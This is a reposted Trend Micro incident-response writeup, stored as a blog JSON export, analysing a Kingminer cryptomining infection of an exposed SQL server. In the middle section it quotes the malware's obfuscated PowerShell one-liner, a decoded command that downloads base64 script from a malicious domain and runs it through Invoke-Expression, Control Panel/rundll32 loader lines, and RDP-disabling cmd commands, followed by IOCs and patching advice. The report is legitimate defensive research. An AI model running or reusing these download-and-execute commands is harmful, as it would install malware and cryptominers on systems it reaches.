{"id":46701,"date":"2022-05-18T00:00:00","date_gmt":"2022-05-18T00:00:00","guid":{"rendered":"urn:uuid:48489dfe-b0c2-a5ed-3f83-3d1512c3e8b0"},"modified":"2022-05-18T00:00:00","modified_gmt":"2022-05-18T00:00:00","slug":"uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/","title":{"rendered":"Uncovering a Kingminer Botnet Attack Using Trend Micro\u2122 Managed XDR"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/KingminerThumbResized.jpg\"> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"50.561998215879\"> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" 
data-article-pageid=\"534182057\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"8.2579113924051\">\n<div class=\"article-details\" role=\"heading\" readability=\"35.946202531646\"> <\/p>\n<p class=\"article-details__description\">Trend Micro\u2019s Managed XDR team addressed a Kingminer botnet attack conducted through an SQL exploit. We discuss our findings and analysis in this report.<\/p>\n<p class=\"article-details__author-by\">By: Buddy Tancio, Jed Valderama <time class=\"article-details__date\">May 18, 2022<\/time> <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"35.775862068966\">\n<div readability=\"19.080459770115\">\n<p>We observed malicious activities in a client\u2019s SQL server that flagged a potential exploit in one public-facing device. A quick look at the Trend Micro Vision One\u2122 Workbench showed that a Microsoft SQL server process created an obfuscated <a href=\"https:\/\/www.trendmicro.com\/vinfo\/ph\/security\/news\/cybercrime-and-digital-threats\/tracking-detecting-and-thwarting-powershell-based-malware-and-attacks\" target=\"_self\" rel=\"noopener\">PowerShell<\/a> command. This suggested that the machine had been compromised, prompting us to investigate further.<\/p>\n<p>The tactics, techniques, and procedures (TTPs) discussed here reflect many of the TTPs that threat researchers have identified with the Kingminer botnet. According to <a href=\"https:\/\/www.bankinfosecurity.com\/kingminer-botnet-targeting-sql-servers-for-cryptomining-a-14412\" target=\"_blank\" rel=\"noopener\">reports<\/a> in mid-2020, malicious actors deployed Kingminer to target SQL servers for cryptocurrency mining. 
Threat analysts have also documented <a href=\"https:\/\/www.zdnet.com\/article\/kingminer-cryptojacker-returns-now-new-and-improved\/\" target=\"_blank\" rel=\"noopener\">known activities<\/a> of the Kingminer botnet operators in November 2018 and their <a href=\"https:\/\/blog.360totalsecurity.com\/en\/weak-password-was-blasted-again-kingminer-mining-new-trojan-variant-online\/\" target=\"_blank\" rel=\"noopener\">reemergence<\/a> in July 2019. Our recent detections therefore suggest a resurgence of the malware, which exploits systems with known, unpatched vulnerabilities. We discuss our findings in the following section.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer01.png\" alt=\"Figure 1. Trend Micro Vision One Workbench detection for the malicious SQL activity\"><figcaption>Figure 1. Trend Micro Vision One Workbench detection for the malicious SQL activity<\/figcaption><\/figure>\n<\/p><\/div>\n<div>\n<div class=\"richText\" readability=\"31.505952380952\">\n<div readability=\"11.285714285714\">\n<p><b>Investigation and analysis<\/b><\/p>\n<p>We observed a <a href=\"https:\/\/www.techopedia.com\/definition\/22809\/visual-basic-script-vbscript\" target=\"_blank\" rel=\"noopener\">VBScript<\/a> file named %PUBLIC%\\gfghhjhyuq.vbs executed through <a href=\"https:\/\/docs.microsoft.com\/en-us\/sql\/tools\/sqlservr-application?view=sql-server-ver15\" target=\"_blank\" rel=\"noopener\">sqlservr.exe<\/a>. This led us to suspect that the device had been exploited through a vulnerability that allowed malicious actors to execute arbitrary code remotely. 
The sqlservr.exe process handles the requests received by a Microsoft SQL Server (MSSQL) database.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer02.png\" alt=\"Figure 2. Trend Micro Vision One\u2122 execution profile of sqlservr.exe using PowerShell to run gfghhjhyuq.vbs\"><figcaption>Figure 2. Trend Micro Vision One\u2122 execution profile of sqlservr.exe using PowerShell to run gfghhjhyuq.vbs<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.768181818182\">\n<div readability=\"12.911363636364\">\n<p>We collected the gfghhjhyuq.vbs file using Trend Micro Vision One to probe further. Despite the script being obfuscated, we were able to uncover most of its functions by decoding the hex string parameters. We describe the chain of events in the following section.<\/p>\n<p>The file first checks for the operating system version through a <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/wmisdk\/wmi-start-page\" target=\"_blank\" rel=\"noopener\">WMI<\/a> object. It then proceeds to download a 32-bit or 64-bit payload depending on the installed Windows version.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer03------------------------gtc.jpg\" alt=\"Figure 3. Partially decoded gfghhjhyuq.vbs used to check the operating system version through a WMI object\"><figcaption>Figure 3. 
Partially decoded gfghhjhyuq.vbs used to check the operating system version through a WMI object<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Next, it downloads a standalone PowerShell binary from a raw file stored in a GitHub user\u2019s repository. Afterward, it saves and executes it as %PUBLIC%\\{timestamp}\\sysdo.exe.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/Kingminer04.jpg\" alt=\" Figure 4. Downloading of 32-bit or 64-bit PowerShell binary from a GitHub repository\"><figcaption> Figure 4. Downloading of 32-bit or 64-bit PowerShell binary from a GitHub repository<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer05.jpg\" alt=\"Figure 5. PowerShell binary copied as sysdo.exe and executed\"><figcaption>Figure 5. PowerShell binary copied as sysdo.exe and executed<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"28.556962025316\">\n<div readability=\"8.0316455696203\">\n<p>Following this, it generates the URL where additional PowerShell scripts will be downloaded. 
The scripts are then executed filelessly using <a href=\"https:\/\/docs.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.utility\/invoke-expression?view=powershell-7.2\" target=\"_blank\" rel=\"noopener\">Invoke-Expression<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer06.jpg\" alt=\"Figure 6. Generating URLs for download and fileless execution of additional PowerShell scripts\"><figcaption>Figure 6. Generating URLs for download and fileless execution of additional PowerShell scripts<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>Finally, it runs a cryptocurrency miner payload through a Control Panel item.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer07.jpg\" alt=\"Figure 7. Execution of cryptocurrency miner through a Control Panel item\"><figcaption>Figure 7. Execution of cryptocurrency miner through a Control Panel item<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Security teams can clearly see and monitor the chain of events in Vision One. 
After the cryptocurrency miner is executed through the Control Panel item, sqlservr.exe calls C:\\Windows\\Temp\\sysdo.exe (renamed as PowerShell binary).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer08.png\" alt=\"Figure 8. Sysdo.exe (renamed as a PowerShell binary) executing the following obfuscated commands directly to memory, detected as Trojan.PS1.MALXMR.PFAIS\"><figcaption>Figure 8. Sysdo.exe (renamed as a PowerShell binary) executing the following obfuscated commands directly to memory, detected as Trojan.PS1.MALXMR.PFAIS<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36.184835402051\">\n<div readability=\"17.844576362655\">\n<blockquote><p><i>&#8220;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe&#8221; -c &#8220;$p=&#8217;b3f8b7aab7d9f2e0bad8f5fdf2f4e3b7bad4f8fad8f5fdf2f4e3b7dae4effafba5b9cfdadbdfc3c3c7acb3f8b9d8e7f2f9bfb0d0d2c3b0bbb0ffe3e3e7adb8b8e0e0b9a4a6a6a4f4f1f3f6f2b9f4f8fab8f2f5b9e3efe3b0bbb7b3d1f6fbe4f2beacb3f8b9c4f2f9f3bfbeacb3e7aab3f8b9e5f2e4e7f8f9e4f2c3f2efe3acccc4eee4e3f2fab9c3f2efe3b9d2f9f4f8f3fef9f0caadadd6e4f4fefeb9d0f2e3c4e3e5fef9f0bfccd4f8f9e1f2e5e3caadadd1e5f8fad5f6e4f2a1a3c4e3e5fef9f0bfb3e7bebeebb1bfd0d6dbb7debdcfbeacf9f2feb7b7bac7d2c7f6e3ffb7f1f1f1f1b7baf9fef4b7e3fc&#8217;;$p = for($i=0; $i -lt $p.length; $i+=2){[char](([byte][char][int]::Parse($p.substring($i,2),&#8217;HexNumber&#8217;)) -bxor 151)};$p=(-join $p) -join &#8216; &#8216;;$p|&amp;(GAL I*X)&#8221;<\/i><\/p><\/blockquote>\n<p>Upon checking the Windows Antimalware Scan Interface (AMSI) telemetry through Vision One, we saw the decoded PowerShell command lines. 
These connect to http:\/\/ww[.]3113cfdae.com\/eb[.]txt th<\/p>\n<blockquote><p><i>$o = New-Object -ComObject Msxml2.XMLHTTP;$o.Open(&#8216;GET&#8217;,&#8217;http:\/\/ww.3113cfdae.com\/eb.txt&#8217;, $False);$o.Send();$p=$o.responseText;[System.Text.Encoding]::Ascii.GetString([Convert]::FromBase64String($p))|&amp;(GAL I*X);nei -PEPath ffff -nic tk<\/i><\/p><\/blockquote>\n<p>As in our analysis of the gfghhjhyuq.vbs script, we also observed through Vision One that sysdo.exe invoked <a href=\"https:\/\/answers.microsoft.com\/en-us\/windows\/forum\/all\/what-is-rundll32exe\/5f707fc5-d78b-4cdd-a5d0-bb0c4b80c3a8\" target=\"_blank\" rel=\"noopener\">rundll32<\/a> with <a href=\"https:\/\/support.microsoft.com\/en-us\/topic\/description-of-control-panel-cpl-files-4dc809cd-5063-6c6d-3bee-d3f18b2e0176\" target=\"_blank\" rel=\"noopener\">main.cpl<\/a>, the Microsoft Control Panel module for mouse settings. 
The malicious actor used this module to launch the payload directly into the device\u2019s memory; the payload connects to the known malicious domain http:\/\/qqqe[.]1eaba4fdae[.]com to download additional components.<\/p>\n<blockquote><p><i>&#8220;C:\\Windows\\System32\\control.exe&#8221; &#8220;C:\\Windows\\system32\\main.cpl&#8221; -QmDvMERT99 http:\/\/qqqe.1eaba4fdae.com\/ -ming day2 -PRHVoCqZ99<\/i><\/p><\/blockquote>\n<blockquote><p><i>&#8220;C:\\Windows\\system32\\rundll32.exe&#8221; Shell32.dll,Control_RunDLL &#8220;C:\\Windows\\system32\\main.cpl&#8221; -QmDvMERT99 http:\/\/qqqe.1eaba4fdae.com\/ -ming day2 -PRHVoCqZ99I*X)&#8221;<\/i><\/p><\/blockquote><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer09.png\" alt=\"Figure 9. Process tree of Control Panel item execution as seen in the Vision One console\"><figcaption>Figure 9. Process tree of Control Panel item execution as seen in the Vision One console<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"37.117602996255\">\n<div readability=\"20.512359550562\">\n<p>We noticed additional PowerShell executions spawned by sqlservr.exe. These were executed by the previously dropped sysdo.exe file. There are two commands here: the first checks whether the installed version of Windows is between Windows 2000 and Windows 7. 
The second checks separately whether hotfixes <a href=\"https:\/\/support.microsoft.com\/en-us\/topic\/may-14-2019-kb4499175-security-only-update-4633b67f-f683-7731-f332-e1e7ec35bfc5\" target=\"_blank\" rel=\"noopener\">KB4499175<\/a> (Windows 7 SP1) and <a href=\"https:\/\/support.microsoft.com\/en-us\/topic\/description-of-the-security-update-for-the-remote-code-execution-vulnerability-in-windows-xp-sp3-windows-server-2003-sp2-windows-server-2003-sp2-r2-windows-xp-professional-x64-edition-sp2-windows-xp-embedded-sp3-\" target=\"_blank\" rel=\"noopener\">KB4500331<\/a> (Windows XP, Windows Server 2003 SP2) are installed. If neither hotfix is present, the system is vulnerable to the BlueKeep vulnerability, <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2019-0708\" target=\"_blank\" rel=\"noopener\">CVE-2019-0708<\/a>. 
If both commands yield negative results, the script disables RDP and the cryptocurrency miner proceeds to its infection routine.<\/p>\n<blockquote><p><i>&#8220;C:\\Windows\\system32\\cmd.exe&#8221; \/c cmd \/c ver |findstr &#8220;5.0 5.1 5.2 6.0 6.1&#8243;&amp;&amp;wmic qfe GET hotfixid |findstr \/i &#8220;kb4499175 kb4500331&#8243;||wmic RDTOGGLE WHERE ServerName=&#8217;%COMPUTERNAME%&#8217; call SetAllowTSConnections 0<\/i><\/p><\/blockquote>\n<blockquote><p><i>&#8220;C:\\Windows\\System32\\cmd.exe&#8221; \/c ver |findstr &#8220;5.0 5.1 5.2 6.0 6.1&#8243;&amp;&amp;wmic qfe GET hotfixid |findstr \/i &#8220;kb4499175 kb4500331&#8243;||wmic RDTOGGLE WHERE ServerName=&#8217;HELPDESK&#8217; call SetAllowTSConnections 0<\/i><\/p><\/blockquote>\n<p><b>Discovering vulnerabilities<\/b><\/p>\n<p>Using internet of things (IoT) search engines such as Shodan and Censys, the team was able to see exposed services such as RDP and SQL and to validate missing patches on any machine. One of the vulnerabilities we found traces back to 2014.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer10.png\" alt=\"Figure 10. Vulnerability found through a Shodan scan on any public-facing machine\"><figcaption>Figure 10. Vulnerability found through a Shodan scan on any public-facing machine<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"41.613263785395\">\n<div readability=\"29.374068554396\">\n<p>Notably, after we detected gfghhjhyuq.vbs (detected as Trojan.VBS.MALXMR.AS), we continued to observe more attempts to drop malware on the same server. Although the malicious actor was unable to execute the malware, the attempts did not stop, since the malware was still there. 
Only after the vulnerability was patched did the attempts cease.<\/p>\n<p><b>Conclusion and security recommendations<\/b><\/p>\n<p>While measures for signature detection are in place to shield an organization\u2019s network from breaches, security teams should still prioritize the identification of vulnerabilities on their servers and endpoints and make sure that these are immediately patched. Doing so is even more crucial for public-facing systems. Adopting a proactive cybersecurity mindset is essential for an organization to thrive as the conduct of business in the digital space deepens and grows.<\/p>\n<p>It is recommended that organizations deploy intrusion detection systems such as <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/network\/advanced-threat-protection\/inspector.html\" target=\"_blank\" rel=\"noopener\">Trend Micro\u2122 Deep Discovery\u2122 Inspector<\/a> as a preventive measure. This is relevant to the case discussed here. Since we did not have network-level visibility, we relied only on endpoint-level data to investigate and respond to the threat. Implementing network monitoring allows security professionals to detect specific server-related vulnerabilities that malicious actors might abuse, in addition to being able to scope out all affected machines on the network. 
A reliable intrusion detection system would also be a useful tool for monitoring and investigating ongoing attacks, since it can provide historical logs of activity in an organization\u2019s network.<\/p>\n<p><b>Indicators of compromise (IOCs)<\/b><\/p>\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\">\n<tbody readability=\"2\">\n<tr>\n<td><b>SHA256<\/b><\/td>\n<td><b>Detection Name<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>0CF6882D750EEA945A9B239DFEAC39F65EFD91B3D0811159707F1CEC6CD80CC0<\/td>\n<td>Trojan.VBS.MALXMR.AS<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>CB29887A45AEA646D08FA16B67A24848D8811A5F2A18426C77BEAAE9A0B14B86<\/td>\n<td>Trojan.PS1.MALXMR.PFAIS<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<ul>\n<li><span class=\"rte-red-bullet\">hxxp:\/\/ww.3113cfdae.com\/eb[.]txt, detected as Dangerous (Disease Vector)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">hxxp:\/\/qqqe.1eaba4fdae[.]com\/, detected as Dangerous (Disease Vector)<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Trend Micro\u2019s Managed XDR team addressed a Kingminer botnet attack conducted through an SQL exploit. We discuss our findings and analysis in this report. 
Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":46702,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9508,9555,9509],"class_list":["post-46701","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-endpoints","tag-trend-micro-research-exploitsvulnerabilities","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.7 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Uncovering a Kingminer Botnet Attack Using Trend Micro\u2122 Managed XDR 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Uncovering a Kingminer Botnet Attack Using Trend Micro\u2122 Managed XDR 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2022-05-18T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/KingminerThumbResized.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Uncovering a Kingminer Botnet Attack Using Trend Micro\u2122 Managed 
XDR\",\"datePublished\":\"2022-05-18T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/\"},\"wordCount\":1464,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr.png\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Exploits&amp;Vulnerabilities\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/\",\"name\":\"Uncovering a Kingminer Botnet Attack Using Trend Micro\u2122 Managed XDR 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr.png\",\"datePublished\":\"2022-05-18T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & 
Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\"}]}<\/script>"}